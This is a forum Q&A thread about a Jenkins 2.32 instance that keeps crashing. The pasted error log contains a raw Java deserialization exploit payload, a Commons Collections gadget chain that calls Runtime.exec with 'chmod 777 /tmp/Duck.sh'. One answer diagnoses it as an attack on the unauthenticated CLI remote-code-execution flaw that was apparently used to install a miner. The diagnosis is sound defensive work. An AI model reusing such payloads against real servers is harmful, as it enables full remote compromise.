# Jenkins throws an HTTP error and crashes

Tags: jenkins

Last night (Sunday night, and no one was working on it) my Jenkins instance threw an HTTP error and crashed. This morning, it managed to restart it, but few minutes later it crashed again with the same error.
It was periodically running 2 jobs: one each 5 minutes (SonarQube analysis + Protractor tests), and the other one each 10 minutes (Gatling tests).
Here is the error log:

```
May 29, 2017 7:51:35 AM hudson.remoting.SynchronousCommandTransport$ReaderThread run
SEVERE: I/O error in channel HTTP full-duplex channel s0m3-3s0t3r1c-k3y
hudson.remoting.DiagnosedStreamCorruptionException
Read back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a
'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*<' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 '~' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 0x0f 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x03 'foosr' 0x00 '*org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 '-[Lorg/apache/commons/collections/Transformer;xpur' 0x00 '-[Lorg.apache.commons.collections.Transformer;' 0xbd 'V*' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 '~' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a
'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x1b 'sq' 0x00 '~' 0x00 0x13 'uq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x18 'sq' 0x00 '~' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 0x16 'chmod 777 /tmp/Duck.sht' 0x00 0x04 'execuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a
'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 '~' 0x00 0x11 0x00 0x00 0x00 '.0,' 0x02 0x14 '_' 0x93 0x12 'gd' 0xda '\' 0x1f 0x0c 'f' 0xeb 0xef ':' 0xf2 0xf8 'N' 0xf1 0x84 0xe7 't' 0x02 0x14 0x01 ' ,' 0x86 0xbf 0xdd 0xe2 0xd4 0xf6 'N.Mt' 0x0e 0x0d 0x00 '!' 0xdd 'L' 0xf6 't' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To\(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 '~' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x04 'asdfxxsq' 0x00 '~' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x02 'sq' 0x00 '~' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 '~' 0x00 0x1a 'q' 0x00 '~' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px'
Read ahead:
        at hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:80)
        at hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93)
        at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75)
        at hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:59)
Caused by: java.lang.ClassCastException: org.apache.commons.collections.map.ReferenceMap cannot be cast to hudson.remoting.Command
        at hudson.remoting.Command.readFrom(Command.java:96)
        at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70)
        ... 1 more
```

I want to know what could've caused the crashes.

My Jenkins version: 2.32.1.7

Thank you

Comment: The same thing have been happening with our Jenkins for about a week, with no apparent reason. Just updated Jenkins and plugins and going to see what happens next.

Answer (score 2):

Other responses suggests its a miscommunication between the master and the slave/one of the slaves.

Are you using a master-slave setup?
If you are not, then I guess it can mean that basically any vital communication failed, and therefor crashed.
I see that you are using an old version.
In the latest version for example, a general HTTP communication error has been fixed:

- If an exception is thrown while rendering an HTTP response, just log the stack trace on the server side, without trying to send an error page to the client. (issue 21695)
  https://jenkins.io/changelog-stable/

I found your issue becasue I had the same error this morning.
Fixed by first restarting the master, and then quickly the slave.
We are running a Docker setup.

Comment: Thanks for your answer. We are not using a master-slave setup, only plain jobs (we created our first pipeline job lately, but not sure if it's what caused the crash). Anyway, I'll upgrade Jenkins as you suggested it, it might help. I'll keep you updated and accept your answer if it fixes my problem.

Comment: I decided not to do it eventually because I saw other people were having the same problem with the latest version. They didn't find a solution either.

Answer (score 0):

Look for shell commands in the output, in this case

```
chmod 777 /tmp/Duck.sht
```

There will be similar log messages, one preceding, downloading that file using `wget`, one after, starting the tool/script.

You're running an outdated Jenkins with critical security vulnerability on a public network and this indicates you're being attacked. References:

- https://groups.google.com/forum/#!topic/jenkinsci-advisories/CcfG--1Hb1o
- https://jenkins.io/security/advisory/2017-04-26/#cli-unauthenticated-remote-code-execution
- https://jenkins.io/blog/2017/04/26/security-advisory/
- https://groups.google.com/forum/#!topic/jenkinsci-advisories/sN9S0x78kMU

While this, from what I've seen in similar reports, only installs a cryptocurrency miner on the master and runs it, it's safest to proceed as this is a complete remote compromise of the machine, all secrets stored on it, and all Jenkins agents connected to it.